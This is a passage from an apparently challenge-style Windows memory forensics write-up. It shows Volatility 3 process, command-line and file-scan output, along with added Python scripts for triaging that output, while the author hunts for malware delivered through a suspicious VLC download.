1284    880     RuntimeBroker.  0xad81ea9a2080  8       -       1       False   2023-06-13 12:33:05.000000      N/A     Disabled
2748    880     smartscreen.ex  0xad81ea9a4080  15      -       1       False   2023-06-13 12:33:07.000000      N/A     Disabled
1052    5200    msedge.exe      0xad81eaa1f080  16      -       1       False   2023-06-13 12:35:24.000000      N/A     Disabled
6612    2992    ngen.exe        0xad81eaa26080  4       -       0       False   2023-06-13 12:35:55.000000      N/A     Disabled
3880    5200    msedge.exe      0xad81eaa29080  16      -       1       False   2023-06-13 12:35:24.000000      N/A     Disabled
5052    740     SecurityHealth  0xad81eaaf6080  27      -       0       False   2023-06-13 12:33:07.000000      N/A     Disabled
3468    880     TiWorker.exe    0xad81eac45080  2       -       0       False   2023-06-13 12:32:38.000000      N/A     Disabled
740     592     services.exe    0xad81ead23080  6       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
592     504     wininit.exe     0xad81ead2a080  2       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
616     584     csrss.exe       0xad81ead340c0  12      -       1       False   2023-06-13 22:32:31.000000      N/A     Disabled
696     584     winlogon.exe    0xad81ead66080  5       -       1       False   2023-06-13 22:32:31.000000      N/A     Disabled
748     592     lsass.exe       0xad81ead81300  9       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
880     740     svchost.exe     0xad81eade9240  18      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
916     592     fontdrvhost.ex  0xad81eae1a140  5       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
908     696     fontdrvhost.ex  0xad81eae1c140  5       -       1       False   2023-06-13 22:32:31.000000      N/A     Disabled
1004    740     svchost.exe     0xad81eaeab2c0  9       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
6420    880     WmiPrvSE.exe    0xad81eaf08080  5       -       0       False   2023-06-13 12:34:44.000000      N/A     Disabled
504     696     dwm.exe 0xad81eaf0a080  22      -       1       False   2023-06-13 22:32:31.000000      N/A     Disabled
1028    740     svchost.exe     0xad81eaf68240  57      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1168    740     upfc.exe        0xad81eafc0080  1       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1212    740     svchost.exe     0xad81eafcc2c0  16      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1220    740     svchost.exe     0xad81eafd92c0  8       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1240    740     svchost.exe     0xad81eafdc2c0  13      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1428    740     VBoxService.ex  0xad81ebc7a240  11      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1592    740     svchost.exe     0xad81ebcee280  16      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1892    740     svchost.exe     0xad81ebd0b080  4       -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1684    4       MemCompression  0xad81ebd0e040  42      -       N/A     False   2023-06-13 12:32:33.000000      N/A     Disabled
6012    740     SgrmBroker.exe  0xad81ebd39080  7       -       0       False   2023-06-13 12:34:34.000000      N/A     Disabled
3316    740     svchost.exe     0xad81ebd3a080  3       -       1       False   2023-06-13 12:32:48.000000      N/A     Disabled
2952    3420    explorer.exe    0xad81ebd3b300  65      -       1       False   2023-06-13 12:32:46.000000      N/A     Disabled
1816    740     svchost.exe     0xad81ebdee0c0  11      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1916    740     svchost.exe     0xad81ebdf22c0  16      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1932    740     svchost.exe     0xad81ebdf42c0  3       -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1924    740     svchost.exe     0xad81ebdf62c0  4       -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1652    740     spoolsv.exe     0xad81ebdfa0c0  8       -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
2052    740     svchost.exe     0xad81ebe970c0  13      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
2232    740     svchost.exe     0xad81ebea2080  12      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
2256    740     MsMpEng.exe     0xad81ebf92340  12      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
2620    1028    taskhostw.exe   0xad81ec0b02c0  6       -       0       False   2023-06-13 12:32:34.000000      N/A     Disabled
6108    1816    audiodg.exe     0xad81ec0c9080  4       -       0       False   2023-06-13 12:33:57.000000      N/A     Disabled
2788    740     svchost.exe     0xad81ec12a240  24      -       0       False   2023-06-13 12:32:34.000000      N/A     Disabled
2976    2620    ngentask.exe    0xad81ec1d6300  5       -       0       True    2023-06-13 12:32:34.000000      N/A     Disabled
2992    2620    ngentask.exe    0xad81ec1e1340  12      -       0       False   2023-06-13 12:32:34.000000      N/A     Disabled
3000    2992    conhost.exe     0xad81ec1e2080  4       -       0       False   2023-06-13 12:32:34.000000      N/A     Disabled
3032    2976    conhost.exe     0xad81ec1ef200  4       -       0       False   2023-06-13 12:32:34.000000      N/A     Disabled
2784    740     svchost.exe     0xad81ec2f3080  6       -       0       False   2023-06-13 12:32:35.000000      N/A     Disabled
788     2976    ngen.exe        0xad81ec3e3080  6       -       0       True    2023-06-13 12:32:35.000000      N/A     Disabled
4172    740     SearchIndexer.  0xad81ec4cf080  16      -       0       False   2023-06-13 12:32:53.000000      N/A     Disabled
3424    740     TrustedInstall  0xad81ec4d0080  3       -       0       False   2023-06-13 12:32:37.000000      N/A     Disabled
3420    696     userinit.exe    0xad81ec59d300  0       -       1       False   2023-06-13 12:32:46.000000      2023-06-13 12:33:15.000000      Disabled
4328    880     StartMenuExper  0xad81ec5bb080  6       -       1       False   2023-06-13 12:32:54.000000      N/A     Disabled
6716    880     ShellExperienc  0xad81ec5be080  17      -       1       False   2023-06-13 12:34:56.000000      N/A     Disabled
3924    740     svchost.exe     0xad81ec6782c0  7       -       1       False   2023-06-13 12:32:43.000000      N/A     Disabled
3932    1028    sihost.exe      0xad81ec679080  12      -       1       False   2023-06-13 12:32:43.000000      N/A     Disabled
3132    1592    ctfmon.exe      0xad81ec754240  12      -       1       False   2023-06-13 12:32:44.000000      N/A     Disabled
3184    1028    taskhostw.exe   0xad81ec75d080  10      -       1       False   2023-06-13 12:32:44.000000      N/A     Disabled
4104    740     svchost.exe     0xad81ecaa2080  3       -       0       False   2023-06-13 12:32:50.000000      N/A     Disabled
5896    880     ApplicationFra  0xad81ecaa4080  3       -       1       False   2023-06-13 12:33:52.000000      N/A     Disabled
4608    880     SearchApp.exe   0xad81ecdcd080  32      -       1       False   2023-06-13 12:32:55.000000      N/A     Disabled
4484    880     RuntimeBroker.  0xad81ecdce2c0  13      -       1       False   2023-06-13 12:32:55.000000      N/A     Disabled
6884    5200    msedge.exe      0xad81ece6f080  14      -       1       False   2023-06-13 12:35:30.000000      N/A     Disabled
5424    5200    msedge.exe      0xad81ecec90c0  11      -       1       False   2023-06-13 12:33:09.000000      N/A     Disabled
928     5200    msedge.exe      0xad81ecfab340  0       -       1       False   2023-06-13 12:35:16.000000      2023-06-13 12:35:44.000000      Disabled
4800    880     RuntimeBroker.  0xad81ed0ec2c0  6       -       1       False   2023-06-13 12:32:55.000000      N/A     Disabled
5200    2952    msedge.exe      0xad81ed0f8080  54      -       1       False   2023-06-13 12:33:08.000000      N/A     Disabled
6016    5200    msedge.exe      0xad81ed0fa080  20      -       1       False   2023-06-13 12:36:00.000000      N/A     Disabled
4768    4172    SearchFilterHo  0xad81ed3cf340  6       -       0       False   2023-06-13 12:35:29.000000      N/A     Disabled
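Both comparisons made by eye above (which foreign addresses in netscan are actually external, and whether psscan turned up an EPROCESS that the pslist/pstree walk missed) are quicker and less error-prone as a script, especially over a 90-row table. The following is an added example rather than code from the original write-up. It assumes each plugin was run once with Volatility 3's default tab-separated renderer and the output redirected to a file; the fixture rows are constructed from a few lines of the tables above, plus one made-up process (PID 7100 at offset 0xad81ee000080, an svchost.exe parented by explorer.exe) so that the hidden-process and parent checks have something to report. EXPECTED_PARENT is my own short list of clean Windows 10 parent/child pairs, not a Volatility feature. One caveat the diff relies on: key on the object offset, not the PID. PIDs are reused, which is almost certainly why the pstree above shows wininit.exe (592) and csrss.exe (516) nested under dwm.exe: their parent was the Session 0 smss.exe instance, which exits once it has spawned them, and its PID 504 was later handed to dwm.exe.

```python
"""Scripted triage of Volatility 3 netscan / pstree / psscan output (added example,
not from the original write-up). Assumes each plugin's default tab-separated output
was saved once, e.g.  vol -f mem.raw windows.netscan > netscan.log"""
import ipaddress


def _tsv(rows):
    """Join cells with tabs, the way the vol3 quick renderer prints a table."""
    return "\n".join("\t".join(r) for r in rows)


# Constructed fixtures: rows copied from the output above. PID 7100 at offset
# 0xad81ee000080 in PSSCAN is made up so the checks have something to catch.
NETSCAN = _tsv([
    ["Offset", "Proto", "LocalAddr", "LocalPort", "ForeignAddr", "ForeignPort",
     "State", "PID", "Owner", "Created"],
    ["0xad81e880e5d0", "TCPv4", "0.0.0.0", "135", "0.0.0.0", "0", "LISTENING",
     "1004", "svchost.exe", "2023-06-13 22:32:31.000000"],
    ["0xad81ea0efb50", "TCPv4", "10.0.2.15", "49682", "20.82.19.171", "443",
     "CLOSED", "2256", "MsMpEng.exe", "2023-06-13 12:33:59.000000"],
    ["0xad81ebf0e3e0", "UDPv4", "127.0.0.1", "55881", "*", "0", "",  # UDP: no State
     "1028", "svchost.exe", "2023-06-13 12:32:34.000000"],
    ["0xad81ecee44a0", "TCPv4", "10.0.2.15", "49793", "62.210.246.226", "443",
     "ESTABLISHED", "5404", "msedge.exe", "2023-06-13 12:35:26.000000"],
    ["0xad81ed3b6930", "TCPv4", "10.0.2.15", "49817", "192.229.221.95", "80",
     "ESTABLISHED", "2748", "smartscreen.ex", "2023-06-13 12:35:56.000000"],
])
PS_HEADER = ["PID", "PPID", "ImageFileName", "Offset(V)", "Threads", "Handles",
             "SessionId", "Wow64", "CreateTime", "ExitTime"]
PS_ROWS = [  # (pstree depth, row)
    (0, ["740", "592", "services.exe", "0xad81ead23080", "6", "-", "0", "False",
         "2023-06-13 22:32:31.000000", "N/A"]),
    (1, ["1028", "740", "svchost.exe", "0xad81eaf68240", "57", "-", "0", "False",
         "2023-06-13 22:32:31.000000", "N/A"]),
    (2, ["2620", "1028", "taskhostw.exe", "0xad81ec0b02c0", "6", "-", "0", "False",
         "2023-06-13 12:32:34.000000", "N/A"]),
    (0, ["2952", "3420", "explorer.exe", "0xad81ebd3b300", "65", "-", "1", "False",
         "2023-06-13 12:32:46.000000", "N/A"]),
]
# pstree prefixes the PID cell with depth markers ("* 1028", "** 2620").
PSTREE = _tsv([PS_HEADER] + [["*" * d + " " + r[0] if d else r[0]] + r[1:]
                             for d, r in PS_ROWS])
# psscan adds a "File output" column and, here, the made-up hidden process.
PSSCAN = _tsv([PS_HEADER + ["File output"]] + [r + ["Disabled"] for _, r in PS_ROWS]
              + [["7100", "2952", "svchost.exe", "0xad81ee000080", "3", "-", "1",
                  "False", "2023-06-13 12:35:00.000000", "N/A", "Disabled"]])

# My own list of clean Windows 10 parents, keyed by vol3's 14-char ImageFileName.
EXPECTED_PARENT = {"svchost.exe": "services.exe", "services.exe": "wininit.exe",
                   "lsass.exe": "wininit.exe", "dwm.exe": "winlogon.exe",
                   "taskhostw.exe": "svchost.exe", "RuntimeBroker.": "svchost.exe"}


def parse_vol3(text):
    """Rows as dicts keyed by header. Only tab-bearing lines count (skips any banner
    and the blank line); split on single tabs so an empty UDP State cell keeps the
    columns aligned; strip pstree depth markers from the PID cell."""
    lines = [ln for ln in text.splitlines() if "\t" in ln]
    header = lines[0].split("\t")
    rows = []
    for ln in lines[1:]:
        cells = ln.split("\t")
        cells[0] = cells[0].lstrip("* ")
        rows.append(dict(zip(header, cells)))
    return rows


def external_connections(netscan_rows):
    """Unique (ip, port, state, pid, owner) for sockets whose foreign address is
    globally routable; drops '*' wildcards, 0.0.0.0, loopback and RFC1918 space."""
    seen = set()
    for r in netscan_rows:
        try:
            ip = ipaddress.ip_address(r["ForeignAddr"])
        except ValueError:  # '*' on UDP rows
            continue
        if ip.is_global:
            seen.add((str(ip), int(r["ForeignPort"]), r["State"], int(r["PID"]), r["Owner"]))
    return sorted(seen, key=lambda c: ipaddress.ip_address(c[0]))


def unlinked_processes(listed_rows, scanned_rows):
    """psscan hits whose EPROCESS offset never appears in the pslist/pstree walk:
    unlinked (hidden) or terminated objects. Keyed on offset, not PID, because PIDs
    are reused (the pstree above nests wininit.exe under dwm.exe for that reason)."""
    listed = {r["Offset(V)"] for r in listed_rows}
    return [r for r in scanned_rows if r["Offset(V)"] not in listed]


def parent_anomalies(rows):
    """(pid, name, ppid, parent name) where the live parent is not the expected one.
    A missing parent is not flagged: csrss/wininit/winlogon are orphaned once the
    session smss.exe that spawned them exits."""
    by_pid = {int(r["PID"]): r for r in rows}
    hits = []
    for r in rows:
        want, parent = EXPECTED_PARENT.get(r["ImageFileName"]), by_pid.get(int(r["PPID"]))
        if want and parent and parent["ImageFileName"] != want:
            hits.append((int(r["PID"]), r["ImageFileName"], int(r["PPID"]), parent["ImageFileName"]))
    return hits


if __name__ == "__main__":
    for conn in external_connections(parse_vol3(NETSCAN)):
        print("external:", *conn)
    for r in unlinked_processes(parse_vol3(PSTREE), parse_vol3(PSSCAN)):
        print("not in list walk:", r["PID"], r["ImageFileName"], r["Offset(V)"])
    for hit in parent_anomalies(parse_vol3(PSSCAN)):
        print("unexpected parent:", *hit)
```

Run as-is to see the fixture results; against the real dumps, replace the fixture strings with the saved plugin output read from disk. The offset diff is the scripted form of the eyeball comparison above: an empty list means psscan added nothing to what pstree already walked, and anything it does return deserves a look at its CreateTime and ExitTime before being called hidden, since a recently exited process shows up the same way.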

But again, no such luck. I then generated a DLL list with dlllist > dlllist.log, but unfortunately I don't yet know enough about Windows DLLs to know what to look for there. We were able to find some stuff that looks interesting with windows.cmdline.CmdLine:

PID     Process Args

4       System  Required memory at 0x20 is not valid (process exited?)
124     Registry        Required memory at 0x20 is not valid (process exited?)
408     smss.exe        \SystemRoot\System32\smss.exe
516     csrss.exe       %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
592     wininit.exe     wininit.exe
616     csrss.exe       %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
696     winlogon.exe    winlogon.exe
740     services.exe    C:\Windows\system32\services.exe
748     lsass.exe       C:\Windows\system32\lsass.exe
880     svchost.exe     C:\Windows\system32\svchost.exe -k DcomLaunch -p
908     fontdrvhost.ex  "fontdrvhost.exe"
916     fontdrvhost.ex  "fontdrvhost.exe"
1004    svchost.exe     C:\Windows\system32\svchost.exe -k RPCSS -p
504     dwm.exe "dwm.exe"
1028    svchost.exe     C:\Windows\system32\svchost.exe -k netsvcs -p
1168    upfc.exe        C:\Windows\System32\Upfc.exe /launchtype boot /cv 51tlxXBJ6UifoEf6UqyGXA.0
1212    svchost.exe     C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1220    svchost.exe     C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1240    svchost.exe     C:\Windows\system32\svchost.exe -k LocalService -p
1428    VBoxService.ex  C:\Windows\System32\VBoxService.exe
1592    svchost.exe     C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p
1684    MemCompression  Required memory at 0x20 is not valid (process exited?)
1816    svchost.exe     C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1892    svchost.exe     C:\Windows\system32\svchost.exe -k appmodel -p
1924    svchost.exe     C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1916    svchost.exe     C:\Windows\system32\svchost.exe -k NetworkService -p
1932    svchost.exe     C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1652    spoolsv.exe     C:\Windows\System32\spoolsv.exe
2052    svchost.exe     C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
2232    svchost.exe     C:\Windows\System32\svchost.exe -k utcsvc -p
2256    MsMpEng.exe     "C:\ProgramData\Microsoft\Windows Defender\platform\4.18.23050.3-0\MsMpEng.exe"
2620    taskhostw.exe   taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2788    svchost.exe     C:\Windows\system32\svchost.exe -k wsappx -p
2976    ngentask.exe    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe" /RuntimeWide /Critical /StopEvent:980
2992    ngentask.exe    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe" /RuntimeWide /Critical /StopEvent:992
3000    conhost.exe     \??\C:\Windows\system32\conhost.exe 0x4
3032    conhost.exe     \??\C:\Windows\system32\conhost.exe 0x4
2784    svchost.exe     C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
788     ngen.exe        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" ExecuteQueuedItems 2 /LegacyServiceBehavior
3424    TrustedInstall  C:\Windows\servicing\TrustedInstaller.exe
3468    TiWorker.exe    C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.2905_none_7dd39c4c7cb9dfa0\TiWorker.exe -Embedding
3924    svchost.exe     C:\Windows\system32\svchost.exe -k UnistackSvcGroup
3932    sihost.exe      sihost.exe
3184    taskhostw.exe   taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
3132    ctfmon.exe      "ctfmon.exe"
3420    userinit.exe    Required memory at 0x7fa4c87020 is not valid (process exited?)
2952    explorer.exe    C:\Windows\Explorer.EXE
3316    svchost.exe     C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p
4104    svchost.exe     C:\Windows\System32\svchost.exe -k swprv
4172    SearchIndexer.  C:\Windows\system32\SearchIndexer.exe /Embedding
4328    StartMenuExper  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
4484    RuntimeBroker.  C:\Windows\System32\RuntimeBroker.exe -Embedding
4608    SearchApp.exe   "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
4800    RuntimeBroker.  C:\Windows\System32\RuntimeBroker.exe -Embedding
1284    RuntimeBroker.  C:\Windows\System32\RuntimeBroker.exe -Embedding
2748    smartscreen.ex  C:\Windows\System32\smartscreen.exe -Embedding
2672    SecurityHealth  "C:\Windows\System32\SecurityHealthSystray.exe"
5052    SecurityHealth  C:\Windows\system32\SecurityHealthService.exe
5124    VBoxTray.exe    "C:\Windows\System32\VBoxTray.exe"
5200    msedge.exe      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
5228    msedge.exe      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\rsteven\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\rsteven\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=114.0.5735.91 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=114.0.1823.37 --initial-client-data=0x164,0x168,0x16c,0x140,0x178,0x7ffed62c4210,0x7ffed62c4220,0x7ffed62c4230
5396    msedge.exe      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1784 --field-trial-handle=1972,i,6865033189529423298,9519355283962404745,262144 /prefetch:2
5404    msedge.exe      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 --field-trial-handle=1972,i,6865033189529423298,9519355283962404745,262144 /prefetch:3
5424    msedge.exe      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2432 --field-trial-handle=1972,i,6865033189529423298,9519355283962404745,262144 /prefetch:8
5896    ApplicationFra  C:\Windows\system32\ApplicationFrameHost.exe -Embedding
4984    WmiPrvSE.exe    C:\Windows\system32\wbem\wmiprvse.exe
4092    svchost.exe     C:\Windows\system32\svchost.exe -k WbioSvcGroup
6108    audiodg.exe     C:\Windows\system32\AUDIODG.EXE 0x51c
3780    svchost.exe     C:\Windows\System32\svchost.exe -k NetworkService -p
6012    SgrmBroker.exe  C:\Windows\system32\SgrmBroker.exe
5916    MoUsoCoreWorke  C:\Windows\System32\mousocoreworker.exe -Embedding
604     svchost.exe     C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
6264    svchost.exe     C:\Windows\System32\svchost.exe -k netsvcs -p
6420    WmiPrvSE.exe    C:\Windows\system32\wbem\wmiprvse.exe
6716    ShellExperienc  "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
6840    RuntimeBroker.  C:\Windows\System32\RuntimeBroker.exe -Embedding
928     msedge.exe      Required memory at 0x9397928020 is not valid (process exited?)
5944    TextInputHost.  "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
3880    msedge.exe      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=17 --time-ticks-at-unix-epoch=-1686659544494870 --launch-time-ticks=180344912 --mojo-platform-channel-handle=4528 --field-trial-handle=1972,i,6865033189529423298,9519355283962404745,262144 /prefetch:1
1052    msedge.exe      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=18 --time-ticks-at-unix-epoch=-1686659544494870 --launch-time-ticks=180356326 --mojo-platform-channel-handle=5072 --field-trial-handle=1972,i,6865033189529423298,9519355283962404745,262144 /prefetch:1
6936    SearchProtocol  "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe2_ Global\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
4768    SearchFilterHo  "C:\Windows\system32\SearchFilterHost.exe" 0 796 800 808 8192 804 780
6884    msedge.exe      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=22 --time-ticks-at-unix-epoch=-1686659544494870 --launch-time-ticks=185473805 --mojo-platform-channel-handle=5984 --field-trial-handle=1972,i,6865033189529423298,9519355283962404745,262144 /prefetch:1
6612    ngen.exe        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior
5736    vlc.exe         "C:\Users\rsteven\Desktop\vlc-win32\vlc.exe"
6016    msedge.exe      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=26 --time-ticks-at-unix-epoch=-1686659544494870 --launch-time-ticks=216196232 --mojo-platform-channel-handle=5684 --field-trial-handle=1972,i,6865033189529423298,9519355283962404745,262144 /prefetch:1
2248    mscorsvw.exe    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 330 -InterruptEvent 0 -NGENProcess 354 -Pipe 2dc -Comment "NGen Worker Process"

What specifically stood out is C:\Users\rsteven\Desktop\vlc-win32\vlc.exe, and we know that "leaked footage" was the cause of the malware infection, so this is good! I dumped the process with windows.pslist.PsList --pid 5736 --dump, but the output didn't contain anything useful and neither did the resulting pid.5736.0x7ff729430000.dmp file. I then ran a file scan with windows.filescan.FileScan > filescan.log to see if our PID was present so we could get our hands on the original infection vector video file (output), and the following relevant results were present:

0xad81eac310c0	\Users\rsteven\Desktop\vlc-win32\libvlc.dll	216
0xad81ec6b5b00	\Users\rsteven\Desktop\vlc-win32\vlc.exe	216
0xad81ecda9910	\Users\rsteven\Desktop\vlc-win32\vlc.exe	216
0xad81ecdb33c0	\Users\rsteven\Desktop\vlc-win32	216
0xad81ed453600	\Users\rsteven\Desktop\vlc-win32\libvlccore.dll	216
0xad81ed454410	\Users\rsteven\Desktop\vlc-win32	216
0xad81ed4545a0	\Users\rsteven\Desktop\vlc-win32\ffmpeg.dll	216
0xad81ed454730	\Users\rsteven\Desktop\vlc-win32	216
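The "stood out" judgement above can be automated for the next pslist dump: flag any process whose image path resolves outside the normal system and Program Files locations. This is an added example, not part of the original writeup; the sample lines are constructed from the pslist output shown above and the trusted-prefix list is an assumption.

```python
"""Triage a Volatility pslist dump: flag processes whose image lives outside the
usual system locations. Added example; the sample rows below are constructed
from the writeup's pslist output, and TRUSTED_PREFIXES is an assumed baseline."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample in the PID / name / command-line layout of the dump above.
SAMPLE_PSLIST = """\
2952    explorer.exe    C:\\Windows\\Explorer.EXE
3932    sihost.exe      sihost.exe
3420    userinit.exe    Required memory at 0x7fa4c87020 is not valid (process exited?)
5124    VBoxTray.exe    "C:\\Windows\\System32\\VBoxTray.exe"
5228    msedge.exe      "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" --type=crashpad-handler
5736    vlc.exe         "C:\\Users\\rsteven\\Desktop\\vlc-win32\\vlc.exe"
4984    WmiPrvSE.exe    C:\\Windows\\system32\\wbem\\wmiprvse.exe
"""

# Directories from which properly installed binaries normally run (assumed baseline).
TRUSTED_PREFIXES = (
    "c:\\windows\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)


@dataclass
class ProcRow:
    pid: int
    name: str
    cmdline: str
    image: Optional[str]  # absolute image path when one could be extracted


def extract_image(cmdline: str) -> Optional[str]:
    """Return the executable path from a command line, or None when there is
    no absolute path (bare names like 'sihost.exe', or Volatility error text)."""
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        if end == -1:
            return None
        candidate = cmdline[1:end]
    else:
        candidate = cmdline.split(" ", 1)[0]
    # Only accept drive-letter absolute paths; anything else cannot be placed.
    return candidate if re.match(r"^[A-Za-z]:\\", candidate) else None


def parse_pslist(text: str) -> List[ProcRow]:
    """Parse 'PID  name  cmdline' rows; lines that do not fit are skipped."""
    rows = []
    for line in text.splitlines():
        m = re.match(r"^(\d+)\s+(\S+)\s+(.*)$", line.strip())
        if not m:
            continue
        pid, name, cmdline = int(m.group(1)), m.group(2), m.group(3)
        rows.append(ProcRow(pid, name, cmdline, extract_image(cmdline)))
    return rows


def flag_untrusted_paths(rows: List[ProcRow]) -> List[ProcRow]:
    """Processes whose image path is known and outside the trusted prefixes."""
    return [r for r in rows
            if r.image is not None
            and not r.image.lower().startswith(TRUSTED_PREFIXES)]


if __name__ == "__main__":
    for r in flag_untrusted_paths(parse_pslist(SAMPLE_PSLIST)):
        print(f"[!] PID {r.pid} {r.name} runs from {r.image}")
```

Rows where Volatility could not read the command line, and rows carrying only a bare executable name, are reported as unplaceable rather than flagged, so they still deserve a manual look.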

I looked more to see if there were any of the common video file types present, such as mov and mp4, but there were no hits. Next I tried to look at the handles of the process via windows.handles.Handles --pid 5736 to look for File or FileObject types, so we could dump the detected files of interest with windows.dumpfiles.DumpFiles --pid 5736 --handles [handle value]. The results of the scan are available in handles.log, but unfortunately I didn't see anything interesting there either.

I tried dumping all the files associated with the PID via windows.dumpfiles.DumpFiles --pid 5736 -D ./dumped_files, but the DataSectionObject ones all said Error dumping file and only the ImageSectionObject or SharedCacheMap ones didn't. I did get some DAT files, so the first thing I did was run strings dumped_files/file.0xad81ec6b5b00.0xad81ea91a150.DataSectionObject.vlc.exe.dat -n 6, but I didn't find anything useful in the output.

Out of ideas, I did some looking around and found a cheatsheet of potentially useful things to try. I started with malfind > malfind.log (output), which is intended to look for code injections, but the results all looked like false positives. I then checked out this article and their suggestions, but we had tried all of them already, so I was completely out of ideas.

